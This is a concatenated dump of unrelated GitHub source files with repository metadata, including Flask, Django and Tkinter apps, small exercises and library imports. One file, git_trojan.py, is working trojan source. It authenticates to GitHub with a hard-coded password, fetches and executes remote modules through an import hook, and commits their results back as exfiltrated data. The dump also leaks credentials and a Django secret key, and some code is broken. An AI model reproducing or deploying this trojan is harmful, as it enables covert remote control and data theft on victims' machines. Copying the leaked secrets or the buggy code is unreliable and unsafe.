        self.assertTrue(not self.model._check_input([1, 2, -1]))
        self.assertTrue(not self.model._check_input([-1, 2, 1]))
        self.assertTrue(not self.model._check_input([3, 2, 1]))
        self.assertTrue(not self.model._check_input([1, 0, 1]))

    def test_forward_sim(self):
        # Regression values obtained with the fixed seed above; the second call
        # continues the same RNG stream.
        out = self.model.forward_simulate([1, 3, 0.4], num_forward_simulations=1, rng=self.rng)
        self.assertAlmostEqual(2.6245675830028423, np.mean(out[0]))
        out = self.model.forward_simulate([1, 3, 0.4], num_forward_simulations=2, rng=self.rng)
        self.assertAlmostEqual(2.1292085866241366, np.mean(out[0]))
| [
"lorenzo.pacchiardi@stats.ox.ac.uk"
] | lorenzo.pacchiardi@stats.ox.ac.uk |
afeca1f1cd07b23047db7c543d9706c25036ef44 | 0d43b36da35dc97239e665dedfa6f5dd6812986e | /examples/kure.py | da3070e7084e790b7b41eac23c4b3337d6021baf | [] | no_license | PaulCotney/tfpipe | 39be244b46a531fbac3a41cf606e957dde6e02e7 | 88008c80c48ccf91527311c7f7ac801c4b0dd0c3 | refs/heads/master | 2021-01-22T09:48:54.127534 | 2018-08-22T13:48:31 | 2018-08-22T13:48:31 | 63,611,894 | 0 | 0 | null | 2017-05-15T16:22:14 | 2016-07-18T14:54:04 | Python | UTF-8 | Python | false | false | 2,340 | py | #!/usr/bin/env python
"""Example pipeline using LSF on Kure.
"""
from os.path import basename as bname
from tfpipe.modules.galaxy import FastxTrimmer, FastqQualityFilter
from tfpipe.pipeline import WorkFlow
def main(args):
job_list = []
for input_file in args.files:
filename = bname(input_file)
trimmer = FastxTrimmer(name='%s_trim' % filename)
trimmer.add_argument('-Q', '33')
trimmer.add_argument('-l', args.num_bp)
trimmer.add_argument('-o',
pjoin(args.out_dir, ''.join(['t', filename])),
'output')
job_list.append(trimmer)
quality = FastqQualityFilter(name='%s_quality' % filename)
quality.add_argument('-Q', '33')
quality.add_argument('-i', trimmer.get_output_file(), 'input')
quality.add_argument('-o',
pjoin(args.out_dir,
''.join(['q', trimmer.get_output_file()])),
'output')
quality.add_argument('-q', args.quality)
quality.add_argument('-p', args.percent)
quality.add_dependencies(done=[trimmer,])
job_list.append(quality)
wf = WorkFlow(job_list)
wf.run() if args.run else wf.show()
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser(prog='kure', usage='%(prog)s [options]')
parser.add_argument('--num-bp',
required=True,
help='Number of base pairs to keep.')
parser.add_argument('--quality',
required=True,
help='Quality value used in filtering.')
parser.add_argument('--percent',
required=True,
help='Percent value used in filtering.')
parser.add_argument('--out-dir',
required=True,
help='Output directory.')
parser.add_argument('files',
nargs='+',
help='Files to filter.')
parser.add_argument('--run',
action='store_true',
default=False,
help='Boolean: run or show pipeline - default: False.')
args = parser.parse_args()
main(args)
| [
"eklundke@gmail.com"
] | eklundke@gmail.com |
e3befb7b065b5be68585a6da785f873742bbffa3 | a6fa311aff9a99ad6a47e41fe34f3f12bb507007 | /reagent/training/__init__.py | 2cc9b73dd0d046b8b5115d9b7e1115535db99f34 | [
"BSD-3-Clause"
] | permissive | cts198859/ReAgent | 222e9dd4aeba455ad5faa9f6178a0e9793cb82fc | 20f3d333821bad364fd567cce97de51c44123484 | refs/heads/master | 2022-09-15T13:08:24.732208 | 2020-05-29T00:51:35 | 2020-05-29T00:54:45 | 267,776,326 | 0 | 0 | BSD-3-Clause | 2020-05-29T05:51:43 | 2020-05-29T05:51:43 | null | UTF-8 | Python | false | false | 987 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
from .c51_trainer import C51Trainer, C51TrainerParameters
from .cem_trainer import CEMTrainer
from .dqn_trainer import DQNTrainer, DQNTrainerParameters
from .parametric_dqn_trainer import ParametricDQNTrainer, ParametricDQNTrainerParameters
from .qrdqn_trainer import QRDQNTrainer, QRDQNTrainerParameters
from .rl_trainer_pytorch import RLTrainer
from .sac_trainer import SACTrainer, SACTrainerParameters
from .td3_trainer import TD3Trainer, TD3TrainingParameters
from .world_model.mdnrnn_trainer import MDNRNNTrainer
__all__ = [
"C51Trainer",
"C51TrainerParameters",
"CEMTrainer",
"RLTrainer",
"DQNTrainer",
"DQNTrainerParameters",
"MDNRNNTrainer",
"ParametricDQNTrainer",
"ParametricDQNTrainerParameters",
"QRDQNTrainer",
"QRDQNTrainerParameters",
"SACTrainer",
"SACTrainerParameters",
"TD3Trainer",
"TD3TrainingParameters",
]
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
62b66a05dc8aa5caa12aef9489257a5f1cadcf17 | f74a2f1918a05bc0138e873c8b5eb4cd71271841 | /myproject/forms.py | 81377bc7dd519bada602c33eef43d658535bd55c | [] | no_license | pratyu2364/Splitwisely | e31874ec548d4a373940c83aeb75a2dff10b8691 | e9c93592d722b95ca234802965666284df0680ee | refs/heads/main | 2023-07-05T05:08:10.359224 | 2021-08-26T14:50:12 | 2021-08-26T14:50:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,603 | py | from flask_wtf import FlaskForm
from wtforms import StringField,PasswordField,SubmitField,IntegerField
from wtforms.validators import DataRequired,Email,EqualTo,Length
from wtforms import ValidationError
from flask_login import current_user
from myproject.models import User
#after Registration user must be able to login
class LoginForm(FlaskForm):
email = StringField('Email',validators = [DataRequired(),Email()])
password = PasswordField('Password',validators = [DataRequired()])
submit = SubmitField('Log in ')
class RegistrationForm(FlaskForm):
email = StringField('Email',validators = [DataRequired(),Email(message='Invalid Email')])
username = StringField('Username',validators = [DataRequired(),Length(min=3,max=32)])
password = PasswordField('Password',validators = [DataRequired(),EqualTo('pass_confirm',message = 'Passwords must match!'),Length(min=3)])
pass_confirm = PasswordField('Confirm Password',validators = [DataRequired()])
submit = SubmitField('Register')
def check_email(self,field):
if User.query.filter_by(email=field.data).first(): # to check that email has already been registered or not
raise ValidationError('Your email has been already registered!')
def check_username(self,field):
if User.query.filter_by(username=field.data).first(): # to check that username has already been taken or not
raise ValidationError('Username is taken!')
class HowToSplit(FlaskForm):
selection = IntegerField('Select the option number',validators=[DataRequired()])
submit = SubmitField('Submit')
| [
"noreply@github.com"
] | pratyu2364.noreply@github.com |
6e4883923ec5fb815e0167591e97e69a1cf130ba | 33c2d74877efa983accde279a31d2841f5a8d185 | /lists/index.py | 7e76f499e05f0b2a4bf05b3242b74f0adf5271af | [] | no_license | venkatsgithub1/Udacity_Intro_to_computer_science | 9ad9965b2bb536b335983d69aab289e5d6bd3304 | cfafeaf4455155ac91573aab2eed61892b24e520 | refs/heads/master | 2021-01-23T22:30:03.581923 | 2017-03-12T06:07:42 | 2017-03-12T06:07:42 | 83,582,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | list1=[1,2,3]
#below line prints out 1, 1 is the index in list list1 where value 2 is present.
print (list1.index(2))
#below line gives out error since 5 is not present in the list.
print (list1.index(5))
| [
"noreply@github.com"
] | venkatsgithub1.noreply@github.com |
763cb3ca80ef8fbf94b9a9dd217d51152ae230f2 | 683828e7321b8c0c775c7da0d60a333caa47873c | /mywebsite/settings.py | 78df12fe8215b5618f12b78025d8f069dbe58791 | [] | no_license | nqiu/mywebsite | 1d85bb0174af54d438b391ea7550bf3e52d4ea8b | a7485704d7bd1f7af2bcc894c1044a3a07fecc0c | refs/heads/master | 2021-01-10T05:49:11.568988 | 2016-01-13T02:32:05 | 2016-01-13T02:32:05 | 49,543,763 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,210 | py | """
Django settings for mywebsite project.
Generated by 'django-admin startproject' using Django 1.9.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '_4px59f3g$5$x81*jw9pg$6s6-g1=w+@7b@q*#i4x7z1xfx!q2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'machines.apps.MachinesConfig'
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mywebsite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mywebsite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| [
"867217317@qq.com"
] | 867217317@qq.com |
037da2e8e79ccf29520c3c52f08d9ae1c51bbb6b | 734badcd6a79d5fd265e291192c39049ee582340 | /python/zp/primjer_09.07.py | 4528f9d2b2577830787f4f2ac7bd2c6b248378cc | [
"MIT"
] | permissive | jasarsoft/examples | 4411b819e1e066f8cb7b192e02332859aa8b86fe | d6fddfcb8c50c31fbfe170a3edd2b6c07890f13e | refs/heads/master | 2021-03-22T00:23:48.254571 | 2019-01-17T23:13:14 | 2019-01-17T23:13:14 | 101,574,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | #varargs parametri
def total(inicijal = 5, *brojevi, **kljucnerijeci):
brojanje = inicijal
print(inicijal)
for broj in brojevi:
brojanje += broj
print("broj = ", broj)
print("brojanje = ", brojanje)
for rec in kljucnerijeci:
brojanje +=kljucnerijeci[rec]
print("kljucnerijeci = ", kljucnerijeci[rec])
return brojanje
print(total(10, 1, 2, 3, povrce = 50, voce = 100))
| [
"edinjasar14@gmail.com"
] | edinjasar14@gmail.com |
b98236ad34d200143fb4b568acf1a27b03dcc1ff | 4b476da7a780526512a42f7f62ef955e89361345 | /CW1-MapReduce/task6/mapper6.py | f22fa60c2cafedaa7060b432f64bc5b8961ca8e4 | [] | no_license | karoleks4/MapReduce-Hadoop-Exercises | bb072536c85ca696ee08d8405f30e0d60f7df250 | 1298ef6333f9c8532cda97b7dcd172d13b3128cb | refs/heads/master | 2020-03-29T02:20:42.183078 | 2018-09-19T10:26:38 | 2018-09-19T10:26:38 | 149,431,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | #!/usr/bin/python
import sys
# Hadoop-streaming mapper: for each whitespace-separated input record emit
# "field0 field1 field2<TAB>field4" (composite key = first three fields,
# value = fifth field).
for line in sys.stdin:
    line = line.strip().split()
    print('{0} {1} {2}\t{3}'.format(line[0], line[1], line[2], line[4]))
"s1448320@sms.ed.ac.uk"
] | s1448320@sms.ed.ac.uk |
d8fc9aa6b18fb2f4bc50363b8a36ca7d158c1c44 | 08b998966c06dc50cd9372fe3e15d6599bcafbfb | /dotfiles/.ipython/profile_default/startup/10-pager.py | 57da300105eaebfc2a84c667499aeb36a6ca7a1d | [
"MIT"
] | permissive | chbrown/config | 77661fc8e485d5a8992114fd11e7eae383698b9b | ec8deb0bf756ff62f5599cb239c8ac11084d3d16 | refs/heads/master | 2021-06-06T10:13:24.401647 | 2021-02-22T15:03:54 | 2021-02-22T15:03:54 | 1,827,574 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | from __future__ import print_function
# IPython.core.hooks.show_in_pager doesn't cut it
import IPython.core.page
def page_printer(data, start=0, screen_lines=0, pager_cmd=None):
    """Replacement pager that prints instead of paging.

    IPython may pass either a plain string or a mime-bundle dict; unwrap the
    'text/plain' payload in the dict case.  The extra parameters mirror the
    IPython.core.page.page signature and are ignored.
    """
    if isinstance(data, dict):
        data = data['text/plain']
    print(data)

# Monkey-patch IPython's pager so startup output is printed inline.
IPython.core.page.page = page_printer
| [
"io@henrian.com"
] | io@henrian.com |
4dd0d222ec273cb9b09cc04b08fc9c26689d7e47 | 73f2acd50df85aaf7fd35864d38cf709e4dcdf2c | /oop.py | 4d8fc66a23ce394746ed6e4f7cc3e7ad0ceac3ce | [
"MIT"
] | permissive | PacktPublishing/Learn-Python-in-3-Hours- | 8cdfa0ace86a197fe09680799b44168a79c78752 | 2f7c2cca7cc612bd5f2290b2af93db514e50b047 | refs/heads/master | 2021-06-08T14:20:31.041189 | 2021-01-14T15:04:23 | 2021-01-14T15:04:23 | 123,421,832 | 8 | 3 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | class Chess:
def __init__(self, player_one, player_two):
self.player_one = player_one
self.player_two = player_two
self.winner = None
def checkmate(self, winner):
self.winner = winner
return self.winner
@staticmethod
def print_game_header():
print('GAME START: CHESS.')
@classmethod
def print_game_name(cls):
print('Chess')
# Bug fix: Chess.__init__ requires both player names, so the original
# no-argument call raised TypeError; supply placeholder players.
game1 = Chess('Player 1', 'Player 2')
game1.print_game_header()
class Car:
    """Base vehicle; subclasses identify themselves via name()."""

    def __init__(self, brand):
        # Fix: the brand argument was accepted but silently discarded.
        self.brand = brand
        self.top_speed = 0.0

    def go(self):
        print('VRRROOOM')
class SuperCar(Car):
    """Car subclass whose display name is 'Super Car'."""
    def name(self):
        return 'Super Car'
class ElecticCar(Car):
    """Car subclass whose display name is 'Electric Car' (class name keeps the
    original 'Electic' spelling for compatibility with existing callers)."""
    def name(self):
        return 'Electric Car'
| [
"sharanjeetk@packtpub.com"
] | sharanjeetk@packtpub.com |
ecd670f6035d91877ece5860650b515ff8b1bd99 | 4265f97771fe9ea316eaa2402075cde92e183ac5 | /euler-python/014.py | 84c7c7414073e92a607ad22609ca9c2a34cd6bc1 | [] | no_license | heinzelotto/project-euler-clojurepythonracket | 24bddcfa3ebc8d93f29f5f732a6b46763b057eba | d4a647f0637530c0ff2d283b7af03057c520d0cf | refs/heads/master | 2021-01-19T19:52:35.510501 | 2017-03-27T00:08:28 | 2017-03-27T00:08:28 | 83,729,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 556 | py | def memoize(f):
memo = {}
def helper(x):
if x not in memo:
memo[x] = f(x)
return memo[x]
return helper
@memoize
def collatz(k):
#print("{}\n".format(k))
if (k == 1):
return 1
elif (k % 2 == 1):
return 1+collatz(3*k+1)
else:
return 1+collatz(k/2)
def euler_14_solution():
    """Project Euler 14: the starting number below one million with the
    longest Collatz chain.

    Only 333332..999999 is scanned — presumably pruning the lower range
    because any n <= 499999 is dominated by 2n (one step longer chain);
    the exact 333332 cutoff is unexplained — TODO confirm.
    """
    argmax = 1
    for i in range(333332, 1000000):
        if collatz(i) > collatz(argmax):
            argmax = i
    return argmax
def main():
    # Print the answer to Project Euler problem 14.
    print(euler_14_solution())

main()
| [
"felix.monninger@gmail.com"
] | felix.monninger@gmail.com |
cd208bb675c06b6242fcfaf225bcc6382c16e642 | fff656ae1c39d02f221710272551edfeaef57e8a | /binary_tree.py | 96922422c84d8ecfdb31fc75f513325d2fb94e5a | [] | no_license | ShawHsing/Algorithms-and-Data-Structures | 54261122e9c6d9c552d36148863fb248b4537158 | d624fbbee6d17cb05eb72a3ee346cd33bb6d6b5c | refs/heads/master | 2021-05-10T10:50:14.666214 | 2018-02-11T07:27:00 | 2018-02-11T07:27:00 | 118,395,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 861 | py | def binary_tree(r):
return [r, [], []]
def insert_left(root, new_branch):
    """Insert new_branch as the left child of root; any existing left subtree
    becomes the left child of the new node.  Mutates and returns root."""
    old_left = root.pop(1)
    if len(old_left) > 1:
        node = [new_branch, old_left, []]
    else:
        node = [new_branch, [], []]
    root.insert(1, node)
    return root
def insert_right(root, new_branch):
    """Insert new_branch as the right child of root; any existing right subtree
    becomes the right child of the new node.  Mutates and returns root."""
    old_right = root.pop(2)
    if len(old_right) > 1:
        node = [new_branch, [], old_right]
    else:
        node = [new_branch, [], []]
    root.insert(2, node)
    return root
def get_root_val(root):
    """Return the value stored at this node."""
    return root[0]

def set_root_val(root, new_val):
    """Overwrite the value stored at this node, in place."""
    root[0] = new_val

def get_left_child(root):
    """Return the left subtree (empty list when there is none)."""
    return root[1]

def get_right_child(root):
    """Return the right subtree (empty list when there is none)."""
    return root[2]
# Demo: build a tree, grab a subtree, mutate it in place, and observe that the
# change is visible through the root (subtrees are shared list objects).
r = binary_tree(3)
insert_left(r, 4)
insert_left(r, 5)
insert_right(r, 6)
insert_right(r, 7)
l = get_left_child(r)
print(l)

set_root_val(l, 9)
print(r)
insert_left(l, 11)
print(r)
print(get_right_child(get_right_child(r)))
| [
"cqyyxiaoxincooi@gmail.com"
] | cqyyxiaoxincooi@gmail.com |
ad4ce1eaa5ae202422239605f4675c436c4dc867 | c58bfad47103f35702eb4917af60447f4b593483 | /lib/massmailer/accountgen/163/generator.py | c692631a10bb13a8bff1cf44a6bb98999c8a21ff | [] | no_license | cironepa/MassMailer | 14b769fab87d392e1e8ec387b265d857a437657b | 369b73f3fcb19eeeaddbaa47000c3e28de9c821c | refs/heads/master | 2021-12-03T11:16:18.813908 | 2014-05-22T15:43:18 | 2014-05-22T15:43:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | __author__ = 'zhoubangtao'
from massmailer.accountgen.account_generator import AccountGenerator
class Generator:
    """Placeholder for the 163.com account generator (not yet implemented)."""
    pass
| [
"zhoubangtao@163.com"
] | zhoubangtao@163.com |
7d37a037f5e68b510438a62a30a7ec35ae547019 | 8426e1bc5dc7041f4cf545ce14773abfc60599d5 | /python/armstrong-numbers/armstrong_numbers.py | bf2cf3e3edbedf1fc6ba66c019f9dab30d1a2678 | [] | no_license | Pujith-M/Exercism-Solutions | 520c959e4b84a68905315bd73b4cc336f937d7c2 | 89ff8d543d76834e44ea89bc34fca97b68e14fe9 | refs/heads/master | 2021-09-08T00:50:38.510200 | 2018-03-04T18:27:23 | 2018-03-04T18:27:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 135 | py | def is_armstrong(number):
return number == reduce(lambda x, y: y ** len(str(number)) + x, [0] + map(int,list(str(number)))):
| [
"pujith.m95@gmail.com"
] | pujith.m95@gmail.com |
d051ac840dd580abefff5f521a92337bda35a2f2 | 961e1882fbc942af188c724da6c4209e8080270b | /main.py | 2d6ee562ef52e6ee4e4447a06d4e771190db67b1 | [
"MIT"
] | permissive | lasithadilshan/myFantasticPythonIDE | 34d72c7f3d89606a45f38bb76b7b36fdc4cb3014 | 2aae0750272e6ac3c6ba02dc1883c49006b8b7fe | refs/heads/master | 2023-05-07T16:52:45.805112 | 2021-05-31T17:07:24 | 2021-05-31T17:07:24 | 372,568,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,783 | py | from tkinter import *
from tkinter.filedialog import asksaveasfilename, askopenfilename
import subprocess
# Root window plus module-level state for the file currently open in the editor.
compiler = Tk()
compiler.title('My Fantastic Python IDE')
file_path = ''
def set_file_path(path):
    """Remember the path of the file currently loaded (module-level state)."""
    global file_path
    file_path = path
def open_file():
    """Prompt for a .py file, load its text into the editor, remember its path."""
    path = askopenfilename(filetypes=[('Python Files', '*.py')])
    with open(path, 'r') as file:
        code = file.read()
        editor.delete('1.0', END)   # clear the whole editor widget
        editor.insert('1.0', code)
        set_file_path(path)
def save_as():
    """Save the editor contents: reuse the known path, else prompt for one."""
    if file_path == '':
        path = asksaveasfilename(filetypes=[('Python Files', '*.py')])
    else:
        path = file_path
    with open(path, 'w') as file:
        code = editor.get('1.0', END)
        file.write(code)
        set_file_path(path)
def run():
    """Execute the saved file with the system Python, showing stdout/stderr."""
    if file_path == '':
        # Nothing saved yet: pop up a reminder instead of running.
        save_prompt = Toplevel()
        text = Label(save_prompt, text='Please save your code')
        text.pack()
        return
    # NOTE(review): shell=True with an unquoted path breaks on paths containing
    # spaces and is shell-injection-prone; prefer subprocess.run([...], shell=False).
    command = f'python {file_path}'
    process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    output, error = process.communicate()
    code_output.insert('1.0', output)
    code_output.insert('1.0', error)
code_output.insert('1.0', error)
# Menu bar: File (open/save/exit) and Run menus wired to the handlers above.
menu_bar = Menu(compiler)

file_menu = Menu(menu_bar, tearoff=0)
file_menu.add_command(label='Open', command=open_file)
file_menu.add_command(label='Save', command=save_as)
file_menu.add_command(label='Save As', command=save_as)
file_menu.add_command(label='Exit', command=exit)
menu_bar.add_cascade(label='File', menu=file_menu)

run_bar = Menu(menu_bar, tearoff=0)
run_bar.add_command(label='Run', command=run)
menu_bar.add_cascade(label='Run', menu=run_bar)

compiler.config(menu=menu_bar)

# Editor pane on top, program-output pane below.
editor = Text()
editor.pack()

code_output = Text(height=10)
code_output.pack()

compiler.mainloop()
| [
"37534587+lasithadilshan@users.noreply.github.com"
] | 37534587+lasithadilshan@users.noreply.github.com |
4ba5ee26b6542dc7c72c0baac9c4df66604e8c89 | 313fd16e8707fd39b9c8d7ed220beb29b3ede9c8 | /ash_project/ash_app/migrations/0001_initial.py | f72fa246e5a7582065ecacb5deeb393e5c9b5c49 | [] | no_license | sriram182001/django-ashwin | e3a55b3770f15cb1bd2669d224b9a4d52b7185fb | 9a934f9e12cce4dd543fea3b010978a09dc6007a | refs/heads/master | 2022-12-04T14:17:41.936433 | 2020-07-10T12:46:48 | 2020-07-10T12:46:48 | 278,625,367 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | # Generated by Django 3.0.3 on 2020-07-10 09:50
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='UserPhoto',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_pic', models.ImageField(upload_to='picture')),
],
),
]
| [
"jjsriram09@gmail.com"
] | jjsriram09@gmail.com |
3ea5e8c2dbe5ce53d591ab42f36cb361afb49c3c | 3f3f797d5472bc3e78c16036017b03ae5f502c91 | /git_trojan.py | f3acf95280fbf1f405bf5e4f80d1e3bc085d1957 | [] | no_license | snowkingbewin/trotest | 48ab15a3c105a986e964fd157f131f26bd3226fb | 6c12508443be111c5affa79439849f5bbb8be36c | refs/heads/master | 2021-05-15T07:33:36.306917 | 2017-11-11T16:45:14 | 2017-11-11T16:45:14 | 110,333,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,541 | py | import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os
from github3 import login
trojan_id = "abc"
trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_modules = []
configured = False
task_queue = Queue.Queue()
def connect_to_github():
    """Authenticate to GitHub and return (session, repo, master branch).

    NOTE(review): credentials are hard-coded in source and committed —
    rotate them and switch to a token/environment variable.
    """
    gh = login(username="snowkingbewin", password="lovelyb123")
    repo = gh.repository('snowkingbewin', 'trotest')
    branch = repo.branch('master')
    return gh, repo, branch
def get_file_contents(filepath):
    """Return the (base64-encoded) blob content of the first tree entry whose
    path contains ``filepath`` on master, or None when absent."""
    gh, repo, branch = connect_to_github()
    tree = branch.commit.commit.tree.recurse()
    for filename in tree.tree:
        # Substring match, so 'a.json' also matches 'data/a.json'.
        if filepath in filename.path:
            print '[*] Foud file %s' % filepath
            blob = repo.blob(filename._json_data['sha'])
            return blob.content
    return None
def get_trojan_config():
    """Fetch and decode <trojan_id>.json from the repo, import any modules the
    tasks need (resolved via GitImporter), and flip the ``configured`` flag."""
    global configured
    config_json = get_file_contents(trojan_config)
    config = json.loads(base64.b64decode(config_json))
    configured = True

    for task in config:
        if task['module'] not in sys.modules:
            exec('import %s' % task['module'])

    return config
def store_module_result(data):
    """Commit a module's output under data/<trojan_id>/<random>.data.

    NOTE(review): the payload is run through base64.b64decode before the
    commit — presumably b64encode was intended for raw module output; confirm
    against what the modules' run() actually returns.
    """
    gh, repo, branch = connect_to_github()
    remote_path = 'data/%s/%d.data' % (trojan_id, random.randint(1000, 10000))
    repo.create_file(remote_path, 'commit message', base64.b64decode(data))
    return
class GitImporter(object):
    """PEP 302 import hook that fetches missing modules from the GitHub repo.

    find_module() downloads modules/<name> once the trojan is configured;
    load_module() exec's the downloaded source into a fresh module object
    (Python 2: imp module and exec statement).
    """
    def __init__(self):
        self.current_module_code = ""  # source of the most recently found module

    def find_module(self, fullname, path=None):
        # Only consult GitHub once the config has been loaded.
        if configured:
            print '[*] Attempting to retrieve %s' % fullname
            new_library = get_file_contents('modules/%s' % fullname)
            if new_library is not None:
                self.current_module_code = base64.b64decode(new_library)
                return self
        return None

    def load_module(self, name):
        # Create a module object and execute the fetched source inside it.
        module = imp.new_module(name)
        exec self.current_module_code in module.__dict__
        sys.modules[name] = module
        return module
def module_runner(module):
    """Thread target: run the named module and commit its result.

    task_queue is used only as an in-flight counter (put on start, get on
    finish); it does not carry data.
    """
    task_queue.put(1)
    result = sys.modules[module].run()
    task_queue.get()

    store_module_result(result)
    return
# Install the GitHub-backed import hook, then poll forever for task configs.
sys.meta_path = [GitImporter()]

while True:
    # Only fetch a new config when no module run is in flight.
    if task_queue.empty():
        config = get_trojan_config()
        for task in config:
            t = threading.Thread(target=module_runner, args=(task['module'],))
            t.start()
            # NOTE(review): `random(1, 5)` calls the random *module* itself and
            # raises TypeError at runtime; random.uniform(1, 5) was probably
            # intended.
            time.sleep(random(1, 5))
    time.sleep(random.randint(1000, 10000))
| [
"1164984406@qq.com"
] | 1164984406@qq.com |
f023b96d1bcc10da7a3a00e98c2a26e6526415ec | b6e7e7c0a68621c613898534f20de96c459fd0a9 | /client/app.py | 9999fc5bcf65ae1e09cde1f359f971321fe32177 | [] | no_license | jwoglom/zoom-tools | 227db0974c7ac239b9ea51b6e95222c765025d66 | 951b20970a990f3b293c593d3969c92550120913 | refs/heads/main | 2023-03-07T18:00:02.646547 | 2021-02-16T21:33:16 | 2021-02-16T21:33:16 | 339,311,304 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,877 | py | #!/usr/bin/env python3
from flask import Flask, Response, request, abort
import random
import string
import subprocess
import os
app = Flask(__name__)

scripts_dir = os.path.join(os.path.dirname(__file__), "../scripts")

# Shared-secret token: TOKEN env var, else a random fallback; a local
# secrets.py providing SELF_TOKEN overrides both.  NOTE(review): that local
# module shadows the stdlib `secrets` package — confirm this is intended.
token = os.environ.get("TOKEN", "".join(random.choice(string.ascii_letters) for i in range(24)))
try:
    from secrets import SELF_TOKEN
    token = SELF_TOKEN
except ImportError:
    pass

print("Token: %s" % token)
@app.before_request
def is_token_set():
    """Reject any request whose ?token=/form token does not match the secret.

    NOTE(review): `!=` is not a constant-time comparison; consider
    hmac.compare_digest to resist timing attacks.
    """
    provided_token = request.args.get("token") or request.form.get("token")
    if provided_token != token:
        print("Provided invalid token %s" % provided_token)
        abort(403)
def run(script):
    """Run one of the zoom_*.sh helper scripts and return its stdout as text."""
    print(os.path.join(scripts_dir, script))
    s = subprocess.run([os.path.join(scripts_dir, script)], capture_output=True)
    return s.stdout.decode()
# Thin HTTP wrappers: each endpoint shells out to the matching zoom_*.sh
# helper script and returns its stdout verbatim.
@app.route('/status', methods=['GET', 'POST'])
def status_route():
    return run("zoom_status.sh")

@app.route('/audio', methods=['GET', 'POST'])
def audio_route():
    return run("zoom_audio_status.sh")

@app.route('/audio/mute', methods=['GET', 'POST'])
def mute_route():
    return run("zoom_mute.sh")

@app.route('/audio/unmute', methods=['GET', 'POST'])
def unmute_route():
    return run("zoom_unmute.sh")

@app.route('/audio/toggle', methods=['GET', 'POST'])
def audio_toggle_route():
    return run("zoom_audio_toggle.sh")

@app.route('/video', methods=['GET', 'POST'])
def video_route():
    return run("zoom_video_status.sh")

@app.route('/video/off', methods=['GET', 'POST'])
def video_off_route():
    return run("zoom_video_off.sh")

@app.route('/video/on', methods=['GET', 'POST'])
def video_on_route():
    return run("zoom_video_on.sh")

@app.route('/video/toggle', methods=['GET', 'POST'])
def video_toggle_route():
    return run("zoom_video_toggle.sh")
if __name__ == '__main__':
app.run('0.0.0.0', port=2626) | [
"j@wogloms.net"
] | j@wogloms.net |
4868d1dff9cc41c8268b865ff7b8ec0d5e5143ac | be2efcca89229247bf0122e2639fe1ff969f152a | /models/vgg.py | 80d3c1b7c057fa345dd9fb206e9f3a2c809f760e | [
"MIT"
